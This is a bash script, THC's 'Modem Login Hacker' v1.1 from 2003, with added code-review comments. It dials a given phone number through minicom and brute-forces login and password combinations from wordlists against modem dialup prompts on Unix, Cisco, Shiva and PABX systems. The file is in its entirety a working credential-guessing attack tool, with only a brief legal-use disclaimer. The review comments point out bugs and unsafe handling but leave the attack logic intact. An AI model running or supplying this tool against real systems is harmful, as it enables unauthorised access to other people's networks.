#!/bin/bash
#
# Modem Login Hacker v1.1 (c) 2003 by van Hauser / THC <vh@thc.org>
#
# Tries to guess login/passwords to break into modem dialups.
# Use only allowed for legal purposes (e.g. authorized penetration tests)
#
# Please read the README for full information
#

# THE ONLY CONFIG OPTION:
# Your modem init string
# Exported further down for the minicom scripts to pick up from the
# environment; an empty value is replaced there by a plain "ATZ".
THC_LH_INIT="AT Z M0"


#########
#
# Do not change anything below!
#
# Version string shown by help() and in the startup banner.
VER="v1.1"
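#######################################
# Print the usage text and exit.
# Globals:   VER (read), $0 (read, shown as the script name)
# Outputs:   usage text to stdout
# Returns:   never returns; exits with status 1
#######################################
help() {
    # A here-doc keeps the quotes around LOGIN:PASSWORD literally. In the
    # original single echo "..." string they closed and reopened the quoted
    # word, so the printed line lacked them.
    cat <<EOF
Modem Login Hacker $VER (c) 2003 by van Hauser / THC <vh@thc.org>

Syntax:
  $0 PHONENUMBER type1 COLONFILE
  $0 PHONENUMBER type2 LOGINFILE PASSWORDFILE
  $0 PHONENUMBER type3 PASSWORDFILE
  $0 PHONENUMBER your_own_script INPUTFILE [INPUTFILE]

Options:
  PHONENUMBER    number to call and try to break in
  LOGINFILE      input file with logins to try
  PASSWORDFILE   input file with passwords to try
  COLONFILE      input file with "LOGIN:PASSWORD" entries

Types:
  type1+type2    should work against any login/password type modem prompts
  type3          should work against any password type modem prompts

This script is really flexible, it works against Unix, Cisco, Shiva, ROLM
PABX, Modem dialin password protection, and many, many more.
Take a look in the README. Use allowed only for legal purposes!
You can always find the newest version at http://www.thc.org
EOF
    exit 1
}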

# Argument validation. $1 = phone number, $2 = script type (looked up as the
# path "$2.scr", relative to the current directory unless $2 is absolute),
# $3 = first input file, $4 = optional second input file. Error messages go
# to stdout, not stderr.
# NOTE(review): test's -a/-o operators are ambiguous when an argument itself
# looks like an operator; separate [[ ... ]] tests joined with && / || would
# not be. An empty $2 is never rejected (it would just look for ".scr").
test -z "$3" -o -z "$1" -o "$1" = "-h" && help
test -e "$2.scr" || {
    echo "Error: Script $2.scr does not exist."
    exit 1
}
# -e only checks existence; an unreadable file passes here and fails at the
# read further down.
test -e "$3" || {
    echo "Error: Inputfile $3 does not exist."
    exit 1
}
test -z "$4" -o -e "$4" || {
    echo "Error: Inputfile $4 does not exist."
    exit 1
}
# type1 and type3 take exactly one input file.
test "$2" = "type1" -a -n "$4" && {
    echo "Error: type1 script only takes a colon file as input"
    exit 1
}
test "$2" = "type3" -a -n "$4" && {
    echo "Error: type3 script only takes a password file as input"
    exit 1
}
# Every other type needs two files. NOTE(review): this also applies to user
# scripts, although the usage text lists their second INPUTFILE as optional.
test "$2" = "type1" -o "$2" = "type3" || {
    test -z "$4" && {
	echo "Error: type2 script needs LOGIN and PASSWORD input files"
	exit 1
    }
}

# Locate a minicom binary.
# NOTE(review): the logic is inverted. A successful `minicom -h` probe sets
# MINICOM to "minicom", and `test -z "$MINICOM" ||` then enters the search
# block only in that success case; when the probe fails MINICOM stays empty,
# the block is skipped and the "Could not find minicom" error is never
# reached. The value found here is also never used: the dial loop further
# down runs the bare name `minicom`.
MINICOM=""
minicom -h 2> /dev/null | grep -qw minicom && MINICOM=minicom
test -z "$MINICOM" || {
    # `which` is not portable; `command -v minicom` is the usual replacement.
    MINICOM=`which minicom 2> /dev/null`
    # Walks the candidate list, assigning each one until an executable is
    # found, so MINICOM ends up as the first executable candidate (the last
    # one is only tested after the loop). NOTE(review): ./minicom puts the
    # current directory ahead of the system locations.
    test -x "$MINICOM" || for i in ./minicom /usr/bin/minicom /usr/local/bin/minicom \
      /bin/minicom /opt/bin/minicom /opt/minicom/minicom /opt/minicom/bin/minicom; do
            test -x "$MINICOM" || MINICOM="$i"
    done
    test -x "$MINICOM" || {
        echo "Error: Could not find minicom in your path."
        exit 1
    }
}

# An empty init string from the config section falls back to a plain reset.
test -z "$THC_LH_INIT" && THC_LH_INIT="ATZ"
# The minicom scripts read the init string and the phone number from the
# environment.
export THC_LH_INIT
export THC_LH_PHONE="$1"
# Session capture (minicom -C) in the current directory, named after the
# phone number and the start time. It records the whole dialogue (the final
# grep looks for "password:" lines in it), so it is at least as sensitive as
# the input files; nothing in this script restricts its permissions.
CAPTUREFILE="${THC_LH_PHONE}_`date +%H%M%S-%d-%m-%y`.cap"

# Work files exchanged with the per-type script, in the current directory:
# the loop below reads $DONE as a count or as a "NOTE:" error line, and
# ${DONE}2 as a second count.
DONE=".${2}.done"
# UUCP-style device lock. NOTE(review): it is removed unconditionally in the
# trap and around every dial, regardless of which process created it.
LOCK="/var/lock/LCK..modem"

# Cleanup on HUP/INT/QUIT/PIPE/TERM. The file names are expanded when the
# trap is installed and word-split when it fires, so a $2 containing
# whitespace would break the rm; the handler also exits 0, which hides the
# interruption from the caller.
trap "/bin/rm -f $DONE ${DONE}2 $LOCK; exit 0" 1 2 3 13 15

LOGIN_COUNT=0          # index of the next LOGIN entry to hand out
PASSWORD_COUNT=0       # index of the next PASSWORD entry to hand out
LOGIN_MAX_COUNT=0      # number of entries read from $3
PASSWORD_MAX_COUNT=0   # number of entries read from $4 (0 when there is no $4)
COUNT=0                # NOTE(review): not referenced anywhere below

declare -a LOGIN
declare -a PASSWORD

# Slurp $3 into LOGIN. NOTE(review): read -d uses only the first character of
# its argument, so '\0' makes the delimiter a backslash rather than NUL; in
# practice the whole file is read and -a splits it on IFS, so every
# whitespace-separated token becomes one entry and entries containing spaces
# fall apart. Without -r, backslashes in the file are treated as escapes —
# TODO confirm the exact delimiter/escape interaction. $3 is unquoted in the
# redirection.
read -d '\0' -a LOGIN < $3
# Count entries up to the first empty element; IFS splitting yields no empty
# elements, so this is effectively ${#LOGIN[@]}.
while [ ! -z "${LOGIN[$LOGIN_MAX_COUNT]}" ]; do
    LOGIN_MAX_COUNT=$(($LOGIN_MAX_COUNT + 1))
done
# Same for the optional second file into PASSWORD.
test -z "$4" || {
    read -d '\0' -a PASSWORD < $4
    while [ ! -z "${PASSWORD[$PASSWORD_MAX_COUNT]}" ]; do
        PASSWORD_MAX_COUNT=$(($PASSWORD_MAX_COUNT + 1))
    done
}

# Startup banner: echo the run parameters back so the operator can check
# them during the 3-second grace period before the first dial.
printf "You are running THC's Modem Login Hacker (Minicom Scripter) %s\n" "$VER"
printf '(c) 2003 by van Hauser / THC - Use only allowed for legal purposes.\n'
printf '\n'
printf 'Phonenumber: %s\n' "$THC_LH_PHONE"
printf 'Script Type: %s\n' "$2"
printf 'Login tries: %s\n' "$LOGIN_MAX_COUNT"
# The password line only appears when a second input file was read.
if [ "$PASSWORD_MAX_COUNT" != "0" ]; then
    printf 'Password tries: %s\n' "$PASSWORD_MAX_COUNT"
fi
printf 'Capturefile: %s\n' "$CAPTUREFILE"
printf 'Starting in 3 seconds ...\n'
sleep 3

# Dial loop: one minicom session per iteration until every LOGIN entry has
# been consumed. Up to five entries are handed to the per-type script per
# session through THC_LH_LOGIN1..5 / THC_LH_PASSWORD1..5; indices past the
# end of an array simply expand to empty strings.
while [ "$LOGIN_COUNT" -lt "$LOGIN_MAX_COUNT" ] ; do
    # type2 / user scripts: logins from $3, passwords from $4.
    # type3: the single input file is exported under the THC_LH_PASSWORD*
    # names (the THC_LH_LOGIN* exports are filled from it as well).
    test "$2" = "type1" || {
        export THC_LH_LOGIN1=${LOGIN[$LOGIN_COUNT]}
        export THC_LH_LOGIN2=${LOGIN[$(($LOGIN_COUNT + 1))]}
        export THC_LH_LOGIN3=${LOGIN[$(($LOGIN_COUNT + 2))]}
        export THC_LH_LOGIN4=${LOGIN[$(($LOGIN_COUNT + 3))]}
        export THC_LH_LOGIN5=${LOGIN[$(($LOGIN_COUNT + 4))]}
        test "$2" = "type3" || {
            export THC_LH_PASSWORD1=${PASSWORD[$PASSWORD_COUNT]}
            export THC_LH_PASSWORD2=${PASSWORD[$(($PASSWORD_COUNT + 1))]}
            export THC_LH_PASSWORD3=${PASSWORD[$(($PASSWORD_COUNT + 2))]}
            export THC_LH_PASSWORD4=${PASSWORD[$(($PASSWORD_COUNT + 3))]}
            export THC_LH_PASSWORD5=${PASSWORD[$(($PASSWORD_COUNT + 4))]}
        }
        test "$2" = "type3" && {
            export THC_LH_PASSWORD1=${LOGIN[$LOGIN_COUNT]}
            export THC_LH_PASSWORD2=${LOGIN[$(($LOGIN_COUNT + 1))]}
            export THC_LH_PASSWORD3=${LOGIN[$(($LOGIN_COUNT + 2))]}
            export THC_LH_PASSWORD4=${LOGIN[$(($LOGIN_COUNT + 3))]}
            export THC_LH_PASSWORD5=${LOGIN[$(($LOGIN_COUNT + 4))]}
	}
    }
    # type1: each entry is "login:password". ${x/:*/} drops everything from
    # the first colon on (login part); ${x/*:/} drops everything up to the
    # last colon (password part), so a colon inside the password truncates
    # it.
    test "$2" = "type1" && {
        export THC_LH_LOGIN1=${LOGIN[$LOGIN_COUNT]/:*/}
        export THC_LH_LOGIN2=${LOGIN[$(($LOGIN_COUNT + 1))]/:*/}
        export THC_LH_LOGIN3=${LOGIN[$(($LOGIN_COUNT + 2))]/:*/}
        export THC_LH_LOGIN4=${LOGIN[$(($LOGIN_COUNT + 3))]/:*/}
        export THC_LH_LOGIN5=${LOGIN[$(($LOGIN_COUNT + 4))]/:*/}
        export THC_LH_PASSWORD1=${LOGIN[$LOGIN_COUNT]/*:/}
        export THC_LH_PASSWORD2=${LOGIN[$(($LOGIN_COUNT + 1))]/*:/}
        export THC_LH_PASSWORD3=${LOGIN[$(($LOGIN_COUNT + 2))]/*:/}
        export THC_LH_PASSWORD4=${LOGIN[$(($LOGIN_COUNT + 3))]/*:/}
        export THC_LH_PASSWORD5=${LOGIN[$(($LOGIN_COUNT + 4))]/*:/}
    }

    # Fresh state for this session; the lock is removed regardless of which
    # process created it.
    /bin/rm -f $DONE ${DONE}2 $LOCK
    # Run the per-type script (-S) without modem/lock initialisation (-o),
    # appending the dialogue to the capture file (-C), 8-bit clean (-8). The
    # outer 2>/dev/null duplicates the inner one; $2 and $CAPTUREFILE are
    # unquoted.
    {
        minicom -S $2.scr -o -C $CAPTUREFILE -8 2> /dev/null
    } 2> /dev/null
    /bin/rm -f $LOCK
    # $DONE is read as the number of entries the session consumed.
    # NOTE(review): if $DONE was not written, FINNISHED is empty, the
    # arithmetic below errors out and LOGIN_COUNT does not advance — TODO
    # confirm whether that re-dials the same entries indefinitely.
    FINNISHED=`cat $DONE`
    # A "NOTE:" line in $DONE signals an error from the script: undo the
    # terminal modes (presumably changed by minicom), ring the bell (\007),
    # show the message and where to resume, and stop with status 1.
    grep -q NOTE: $DONE 2> /dev/null && {
	stty echo
	stty opost
	stty icrnl
	stty icanon
	clear
        echo
	echo -e "ERROR --- \007"
	cat $DONE
        echo
        echo "Finnished tries: $LOGIN_COUNT"
        echo "Next entry from file $3 would have been: \"${LOGIN[$LOGIN_COUNT]}\""
        test "$PASSWORD_MAX_COUNT" = "0" || echo "Next entry from file $4 would have been: \"${PASSWORD[$PASSWORD_COUNT]}\""
	exit 1
    }
    LOGIN_COUNT=$(($LOGIN_COUNT + $FINNISHED))
    # Two-file bookkeeping (type2 and user scripts): a non-zero FINNISHED has
    # just advanced LOGIN_COUNT, so the password index restarts at 0. With
    # FINNISHED=0 and ${DONE}2 present, ${DONE}2 holds how many passwords
    # were consumed for the current login; once the password list is
    # exhausted, reset it and move to the next login.
    test "$2" = "type1" -o "$2" = "type3" || {
	test "$FINNISHED" = "0" || PASSWORD_COUNT=0
        test "$FINNISHED" = "0" -a -e "${DONE}2" && {
	    FINNISHED=`cat ${DONE}2`
	    PASSWORD_COUNT=$(($PASSWORD_COUNT + $FINNISHED))
	    test "$PASSWORD_COUNT" -ge "$PASSWORD_MAX_COUNT" && {
	        PASSWORD_COUNT=0
	        LOGIN_COUNT=$(($LOGIN_COUNT + 1))
	    }
        }
    }
done

# Normal completion: put the terminal modes back, clear the screen, list the
# capture-file lines flagged by the scripts, then remove the work files and
# the lock.
for tty_mode in echo opost icrnl icanon; do
    stty "$tty_mode"
done
clear
printf '\n'
printf 'Finnished!\n'
printf '\n'
printf 'Important entries in %s:\n' "$CAPTUREFILE"
grep "^NOTE: .* password:" $CAPTUREFILE 2> /dev/null
printf '\n'

/bin/rm -f $DONE ${DONE}2 $LOCK
exit 0
